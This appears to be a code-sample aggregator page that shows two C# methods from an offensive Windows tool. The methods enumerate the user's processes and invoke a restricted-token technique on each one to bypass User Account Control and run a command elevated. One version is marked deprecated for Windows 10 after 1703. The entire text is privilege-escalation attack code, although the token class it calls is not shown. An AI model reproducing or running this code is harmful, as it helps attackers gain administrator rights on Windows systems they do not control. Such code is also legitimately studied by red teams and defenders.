Exemple #1
0
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        public static void BypassUAC(String input)
        {
            Int32  processID;
            String command;

            if (GetProcessID(input, out processID, out command))
            {
                using (RestrictedToken rt = new RestrictedToken())
                {
                    rt.BypassUAC(processID, command);
                }
            }
            else
            {
                String name = WindowsIdentity.GetCurrent().Name;
                Dictionary <UInt32, String> uacUsers = Enumeration.EnumerateUserProcesses(true, name);
                foreach (UInt32 pid in uacUsers.Keys)
                {
                    Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", pid, uacUsers[pid]);
                    using (RestrictedToken rt = new RestrictedToken())
                    {
                        rt.BypassUAC((Int32)pid, input);
                    }
                }
            }
        }
 ////////////////////////////////////////////////////////////////////////////////
 // UAC Token Magic - Deprecated
 ////////////////////////////////////////////////////////////////////////////////
 private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
 {
     Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");
     if (cLP.Remote)
     {
         using (RestrictedToken rt = new RestrictedToken(hToken))
         {
             rt.BypassUAC(cLP.ProcessID, cLP.Command);
         }
     }
     else
     {
         string name = WindowsIdentity.GetCurrent().Name;
         Dictionary <uint, string> uacUsers = UserSessions.EnumerateUserProcesses(true, name);
         foreach (uint pid in uacUsers.Keys)
         {
             Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", pid, uacUsers[pid]);
             using (RestrictedToken rt = new RestrictedToken(hToken))
             {
                 rt.BypassUAC((int)pid, cLP.Command);
             }
         }
     }
 }